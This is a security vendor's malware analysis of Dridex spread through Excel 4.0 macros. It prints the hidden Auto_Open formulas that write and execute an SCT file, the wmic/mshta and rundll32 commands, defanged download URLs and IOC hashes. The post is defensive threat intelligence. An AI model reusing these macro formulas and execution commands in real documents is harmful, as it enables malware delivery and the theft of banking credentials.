Dridex Distributed Through Excel 4.0 Macro

The ASEC analysis team has recently discovered that the method of distributing Dridex via Excel files is changing more rapidly and frequently. The team has been introducing the distribution method of Dridex through the ASEC blog since last year, and the latest related post was uploaded last month to introduce Excel file that uses the task scheduler to distribute Dridex. The recently distributed Excel files use the Excel 4.0 macro instead of the VBA macro which was used in previous cases. We assume that the attacker made this change to bypass detection, and the interval at which the attacker is changing the method is becoming shorter.

The following figures show the content of Excel files that are being distributed as of now. They use various images to trick users into clicking the Enable Macro button.

Content (1)
Content (2)
Content (3)

The macro used to perform malicious activities is the Excel 4.0 macro, not the VBA macro that was used previously. When the macro is run, the formulas in cells are automatically executed through Auto_Open that exists in a hidden sheet and perform malicious activities.

Auto_Open that exists in hidden sheet

Through Auto_Open, malicious formula macros are run in the following order, creating and running a malicious file.

  • Malicious Formula Macros
    =FOPEN(GET.NOTE(Macro1!$A$3, 1, 200), 1+2)
    =FOR.CELL(“HdOrvNpzIeLysqA”,D160:AR521, TRUE)
    =FWRITE(B152,CHAR(HdOrvNpzIeLysqA))
    =NEXT()
    =FCLOSE(B152)
    =EXEC(GET.NOTE(Macro1!$A$4, 1, 200))

The malicious data used in this stage are dispersed in cells with the note attached. The notes are hidden, but you can use the Show/Hide Note feature to check the malicious data. The data saved in notes show the path the file is created and the command that runs it. The data of the created file is saved in a certain cell (D160:AR521) in decimal.

The created malicious file is saved in the ProgramData folder with the sct extension and executed through the wmic command.

  • File Creation Path
    C:\ProgramData\fCLjKsEAHjoxErF.sct
  • File Execution Command
    wmic process call create ‘mshta C:\ProgramData\fCLjKsEAHjoxErF.sct’
Malicious data hidden in notes
Malicious data in certain cells

Below is a part of the code for the created sct file, obfuscated with many annotations. When the file is run, it creates an additional sct file in the ProgramData folder. The additionally created file has the feature of running the dll file that is created after.  

Creating additional sct file

The file then attempts to connect to 5 URLs to download a malicious file and save it in the ProgramData folder with the dll extension. The downloaded dll was confirmed as Dridex.

  • Download URL
    hxxp://coldchallenge[.]xyz:8080/js/filler_dk9naf.png
    hxxp://updateviacloud[.]xyz:8080/files/filler_dk9naf.png
    hxxp://updateviacloud[.]xyz:8080/wp-heme/filler_dk9naf.png
    hxxp://updateviacloud[.]xyz:8080/js/filler_dk9naf.png
    hxxps://space.egematey[.]com/wp-content/cache/wpfc-mobile-cache/proclus-the-quaestor/amp/j4a42p0W.php
Downloading Dridex

After downloading the malware, the file runs the additionally created sct file.

Running additionally created sct

The following shows a part of the code for the additionally created sct file. Once it is run, it executes the downloaded Dridex with the following command.

  • File Execution Command
    wmic process call create “rundll32.exe C:\\ProgramData\ljneLUpdLaTjomtIyXuy.dll GetDesktopDPI”
Executing Dridex

Dridex is a banking malware that collects user information related to banking. It can also download the main module through a loader to perform additional malicious behaviors. In the past, there have been cases of malware distributing DopplePaymer, BitPaymer, and CLOP ransomware. Because Excel files that distribute Dridex are continuously changing and files that include malicious macros are mainly distributed through spam mails, users should refrain from opening files from unknown sources and take caution.

[File Detection]

  • Downloader/XLS.Dridex
  • Trojan/Win.BankerX-gen.R438509

 [IOC Info]

  • 2e118f4e98e8e41ece2be3a5b94245ba
  • c7d07592916c5f79bf0dca4b9fccda50
  • f71f826eb4d2700598476026fea1030e
  • c4ac79f00a9958a719c850995f860d8d
  • ab6b811f95b68076b5e5de338edb0f3c

 [Previous Blog Posts about Dridex Distributed via Excel]

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:, ,

0 0 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments